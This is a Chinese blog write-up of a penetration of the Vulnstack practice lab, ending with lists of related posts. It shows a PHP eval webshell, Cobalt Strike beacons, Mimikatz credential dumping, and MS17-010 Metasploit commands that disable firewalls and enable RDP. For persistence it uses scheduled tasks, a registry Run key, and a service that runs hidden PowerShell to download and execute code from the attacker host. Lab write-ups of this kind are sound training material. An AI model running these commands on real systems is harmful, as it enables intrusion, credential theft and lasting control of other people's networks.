内网渗透之vulnstack靶场系列(一)

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量2k 收藏 19
点赞数 1
分类专栏: 靶场 文章标签: 内网渗透 Cobalt Strike 系统安全 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/127384012
版权

一、环境搭建

拓扑图

image-20221017101315920


用户配置

Vulnstack靶场有两个默认用户, 分别是域成员liukaifeng01和域管理员用户Administrator, 其默认密码均为hongrisec@2019

首次登录会要求用户修改密码, 除此之外我还新添加了个test1用户用于登录win2003主机

所有的用户信息如下表格所示:

登录主机用户密码
win2008 (域控服务器)AdministratorQWEasd123
win7-1 (web服务器)liukaifeng01qQ123456
win2003 (域内主机)test1qQ123456

虚拟主机配置信息

虚拟机网卡信息ip
Kali linux (用于搭建CS服务器和MSF服务器)NAT192.168.47.134
win7 (攻击机)NAT192.168.47.133
win7-1 (web服务器)NAT
VMnet3		192.168.47.148

192.168.52.143
win2008 (域控服务器)VMnet3192.168.52.138
win2003 (域内主机)VMnet3192.168.52.141

下图为VMnet3网卡的配置信息, 配置的子网IP为192.168.52.0, 设置为仅主机模式

1


下图为NAT模式的VMnet8网卡配置信息, 配置的子网IP为192.168.47.0

2


网络连接配置

域控的网络连接配置如下:

image-20221013083305857


Web服务器有两个网卡, 其中一个网卡是用于Web服务器与域内主机进行数据交互, 此网卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的网络配置亦是如此, 这里就不详细描述了

3


配置web网站

在web服务器(win7)找到phpstudy\www目录, yxcms就是搭建在外网的网站源码

image-20221013084602683


找到phpstudy的站点域名设置, 将网站目录设置成yxcms目录的绝对路径, 网站端口设置成81, 网站域名可随意设置, 这里我设置成www.henry404.net, 然后点击修改, 再点击保存设置并生成文件

image-20221013085753160


修改Web服务器的hosts文件, 将本机的ip绑定如上设置好的域名

为什么要给192.168.52.143绑定域名? —— 为了让攻击机能够解析域名

修改hosts文件时可能要管理员权限, 需要先给当前用户赋予修改host文件的权限,此处不详细描述

image-20221013085924303


攻击机的hosts文件也要修改成与上述一致

3


web服务器启动phpstudy, 然后在攻击机使用浏览器访问www.henry404.net:81, 若出现如下图所示的页面则代表网站配置成功

2


二、渗透web服务器

1.拿下网页后台

访问配置好的网站,在其公告信息已经说明了网站的后台目录(/index.php?r=admin)以及管理员的账号密码(admin,123456)

img


访问网站后台页面(www.henry404.net:81/index.php?r=admin), 输入账号密码登录后台

动画


2.写入webshell

点击前台模板->管理模板文件, 随后会显示前台的php模板文件

image-20221013145639509

image-20221013145820329


点击右上角的新建按钮, 新建一个前台模板文件并写入webshell(<?php @eval($_POST['cmd']);?>), 随后点击创建

image-20221013225441793


3.连接webshell

此处不详细讲述如何寻找webshell文件的网页路径, 毕竟此靶场是以内网渗透为主

webshell的网页路径为:http://www.henry404.net:81/protected/apps/default/view/default/test.php, 使用蚁剑连接webshell, 即可对网站进行接下来的渗透

image-20221013225929741

image-20221013230032214


4.远程命令执行CS上线

此处不演示CS服务的搭建过程, 如果想了解Cobalt Strike的相关操作可以翻阅我博客发布的CS系列文章

先使用CS客户端生成一个可执行程序木马, 然后通过蚁剑将其上传至网站服务器上, 这里选择上传至phpstudy/WWW目录

上传至C盘目录可能会因为权限问题导致上传失败

1

image-20221015200538626


在木马所在目录打开终端, 输入artifact.exe运行上传的木马程序

image-20221015200723517

image-20221015200857608


返回CS客户端查看Web服务器上线情况

image-20221015200955417


三、内网渗透

信息收集

收集域内信息

1.查看网关的ip地址, DNS的ip地址、域名等等: shell ipconfig /all

  • 主机名: win7-1
  • 主域: god.org
  • 网卡1的ip: 192.168.47.149; 网卡2的ip: 192.168.47.143
  • DNS服务器: 192.168.52.138

image-20221015202051598


2.列出当前域控的主机列表: net view

  • OWA(192.168.52.138)
  • ROOT-TVI862UBEH(192.168.52.141)
  • WIN7-1(192.168.52.143)

image-20221015204235545


3.列出当前域的域控: net dclist

当前的域控是OWA(192.168.52.138)

image-20221015204124124


4.查看当前主机的共享列表: net share \\[主机名]

可以发现当前主机默认开启了C盘共享功能

image-20221015204700456

收集用户信息

1.查看当前主机的用户列表: shell net user

image-20221015213502712


2.查看当前主机的登录用户: shell echo %username%

image-20221015213635569


3.判断当前用户是否属于管理员组: shell whoami/groups

这里并没有发现liukaifeng01的所在组别, builtin是内建用户

内建用户: 系统刚安装完成时所创建的用户, 并非当前登录用户

image-20221015211229109


4.查询本地管理员组的用户: shell net localgroup administrators

可发现liukaifeng01属于本地管理员组

image-20221015215210073


5.查看当前域内所有用户: shell net user /domain

image-20221015213222577


尝试获取用户账号密码

由于当前用户liukaifeng01属于管理员组, 可以对其使用ms14-058提权模块, 提权后会返回一个SYSTEM权限的用户

1


对拥有SYSTEM权限的会话运行Mimikatz, 随后在beacon命令行会返回用户的账号信息

image-20221015223405630

image-20221015223553224


当然在视图->凭证信息查看用户数据会更加清晰明了

  • 域管理员账号密码: Administrator/QWEasd123
  • 当前用户账号密码: liukaifeng01/qQ123456

image-20221015223706351


横向移动

漏洞扫描

上传ladon工具至Web服务器上的C盘上

image-20221015230023173


随后在beacon命令行输入:shell ladon.exe 192.168.52.0/24 MS17010, 扫描Web服务器所处C段的IP是否存在MS17010漏洞

image-20221015230735012

发现有三台主机存在MS17010漏洞, 且其中一台主机(192.168.52.138)是域控服务器


漏洞利用

为了将kali的MSF杀进内网, 我们要在Web服务器开启socks4代理, 走1080端口, beacon命令行输入: socks 1080

image-20221016153634445

Socks 代理相应的采用 Socks 协议, 代理服务器就是 Socks 服务器,这是一种通用的代理服务器。代理服务器是指位于使用者和服务器之间的计算机。通过拦截发送方和接收方之间的连接来工作。重要的是可以隐藏用户实际IP地址保护用户信息安全


在MSF设置socks4代理服务器以及开通双向隧道

msf > setg proxies socks4:192.168.47.134:1080  #配置msf的socks代理服务器
msf > setg ReverseAllowProxy true #开启双向隧道

image-20221016160721957


使用auxiliary/admin/smb/ms17_010_command针对MS17010漏洞执行远程命令进行关闭防火墙

关闭防火墙的Dos命令: netsh advfirewall set allprofiles state off

查看防火墙状态的Dos命令: netsh advfirewall show allprofiles

msf5 > use auxiliary/admin/smb/ms17_010_command  #使用ms17010远程命令执行模块

msf5 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138  #设置目标主机ip

msf5 auxiliary(admin/smb/ms17_010_command) > set command netsh advfirewall set allprofiles state off #设置远程执行的命令(此处命令是关闭防火墙)

msf5 auxiliary(admin/smb/ms17_010_command) > run #开启攻击

1


执行远程命令开启3389端口(远程服务), 发现远程服务开启失败

msf5 auxiliary(admin/smb/ms17_010_command) > set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

msf5 auxiliary(admin/smb/ms17_010_command) > run

开启远程服务的Dos命令: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查询3389端口是否打开的Dos命令: netstat -an | find "3389"

image-20221017112643655


接下来攻击域内成员win2003主机, 这次使用exploit/windows/smb/ms17_010_psexec模块, 返回目标主机的meterpreter会话(MSF上线)

set rhost 192.168.52.141  #设置目标主机

set payload windows/meterpreter/bind_tcp  #设置监听协议

set lhost 192.168.47.134  #设置MSF的服务器IP

set lport 7777 #设置监听端口

run

image-20221017234351309


生成跳板木马

由于CS服务器无法与域控服务器进行数据交互, 只能与web服务器进行数据交互, 因此要将web服务器作为跳板来实现CS服务器与域控服务器之间的数据交互

创建跳板监听: 鼠标右键单击用户->中转->listener

监听的IP应为跳板主机的内网ip(能够与域控进行通讯)

image-20221016210053584

image-20221016210246839


在生成后门处选择Windows Executable(S), 即生成无状态木马, 然后上传至Web服务器的C盘目录

Windows 带有生成出的是stageless版本(无状态Windows后门木马),下面简单说下这个无状态木马的使用方法。一般使用无状态木马的网络环境是这样的

img

如果开启了防火墙可能会产生安全警告,最好提前用cmd关闭防火墙或者新建放行规则,然后便可以将无状态木马放入到其他内网机器中执行

image-20221016210429801

image-20221016211032234


域内文件传输

通过创建C盘共享将生成的无状态木马传送至域控服务器

与目标IP实现C盘共享: shell net use \\192.168.52.138\c$ "QWEasd123" /user:"Administrator"

image-20221016211707102


将Web服务器C盘的无状态木马拷贝至域控服务器C盘处: shell copy c:\\beacon.exe \\192.168.52.138\c$

image-20221016211855921


查看域控的C盘目录: shell dir \\192.168.52.138\c$, 判断木马是否拷贝成功

image-20221017091802106


返回MSF界面, 利用ms17010漏洞远程命令执行C盘的无状态木马: set command c:\\beacon.exe

image-20221016221341279


随后在cs客户端查看域控服务器的上线情况

image-20221016221652207


权限维持

创建计划任务

使用schtasks命令远程创建计划任务执行后门程序, 前提要知道远程主机的管理员账号密码

schtasks /create /s 192.168.52.138 /u Administrator /p QWEasd123 /ru "SYSTEM" /tn test /sc DAILY /st 20:45 /tr C:\\beacon.exe /F

/ru: 运行该任务的用户, 对于系统帐户,有效值是 “”、“NT AUTHORITY\SYSTEM” 或"SYSTEM"

/tn: 任务名称

/sc: 任务执行频率, 其中daily表示每天执行

/tr: 要执行的文件

/F: 强制执行任务


查看域控服务器的任务计划程序, 可发现刚创建的后门计划任务

1


若要清除计划任务执行以下命令

schtasks /delete /s 192.168.52.138 /tn "test" /f

创建windows服务

使用sc命令创建一个名为"name"的服务, 设置开机后门脚本程序自启动, 注意将powershell命令行替换成自己的

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))\""

设置name服务自启动

shell SC config "name" start= auto

设置服务的描述内容

shell SC description "name" "description"

启动服务

shell net start "name"

删除服务

shell SC delete "name

创建注册表后门

/d后的文件路径修改成后门程序的路径

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\\beacon.exe" /f

总结

1.ms17_010_psexec模块的利用条件

  • 防火墙必须允许SMB流量出入
  • 目标必须使用SMBv1协议
  • 目标必须缺少MS17-010补丁
  • 目标必须允许匿名IPC $和管道名

2.使用ms17_010_psexec模块有几率导致蓝屏


3.开启远程服务和关闭防火墙需要管理员权限


Henry404s
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透之常见命令
03-14
内网渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
YXcms-含有SQL注入漏洞的源码包 (3).zip
12-31
YXcms-含有SQL注入漏洞的源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1250
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1274
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 834
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
渗透测试之Vulnstack1内网域渗透
LvHLong的博客
04-27 3315
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
电脑教程内网渗透之内网穿透.rar
10-25
内网穿透,也被称为NAT穿透或端口映射,是网络技术中一个重要的概念,尤其是在计算机网络安全和远程访问领域。这个主题涉及到如何使内网中的设备能够被公网或者其它内网设备直接访问,通常在家庭和企业网络环境中,...
手把手教你入门内网渗透之一 .pdf
09-05
手把手教你入门内网渗透之一 安全防御 企业安全 大数据 web安全 漏洞挖掘
【红日靶场vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1255
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
vulnstack1 渗透分析 红日靶场(一)
黑战士的博客
03-22 1195
当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在mysqld内加入secure_file_priv =“”。当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW。选择psexec横向移动。
Vulnstack内网靶场渗透(ATT&CK实战系列-红队评估(七))
DG_s1mple
04-18 6330
这么久没打vulnhub全是因为在吃这一套内网靶场(绝对没有在摸鱼 ),现在把我的思路写下来 前言 这是Vulnstack里的一套靶场,ATT&CK实战系列-红队评估(七) 这是靶场的链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 网络环境 整个靶场环境一共五个靶机(总共27.8 GB),分别位于三层网络环境中: DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192
复现红日安全-ATT& CK实战:Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 1016
内网实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外网:192.168.154.0内网:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)网络配置Win7服务开启。
红日靶机vulnstack01【精华总结】
qq_45300786的博客
07-22 2827
总结:一 如果3389开放,但是用防火墙:那么有3中方法突破 1、msf反弹shell,然后使用run post/windows/manage/enable_rdp,意思是防火墙允许远程桌面 2、msf反弹shell,命令行直接添加防火墙3389开放规则 netsh advfirewall firewall add rule name=“Open 3389” dir=in action=allow protocol=TCP localport=3389 3、使用隧道:目标机有防火墙的话,我们是被目标机防火墙
内网渗透Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1551
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
vulnstack(红日)内网渗透靶场二: 免杀360拿下域控
xf555er的博客
05-30 2350
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1517
红日安全实战:Vulnstack靶场实战(一)
ms17_010_psexec
weixin_30470643的博客
05-18 729
一、ms17_010_psexec简介 MS17-010 的psexec是针对Microsoft Windows的两款最受欢迎的漏洞进行攻击。 CVE-2017-0146(EternalChampion / EternalSynergy) CVE-2017-0143(EternalRomance / EternalSynergy) 与EternalBlue相比,此模块具有高可靠性和优先级,其中管道...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值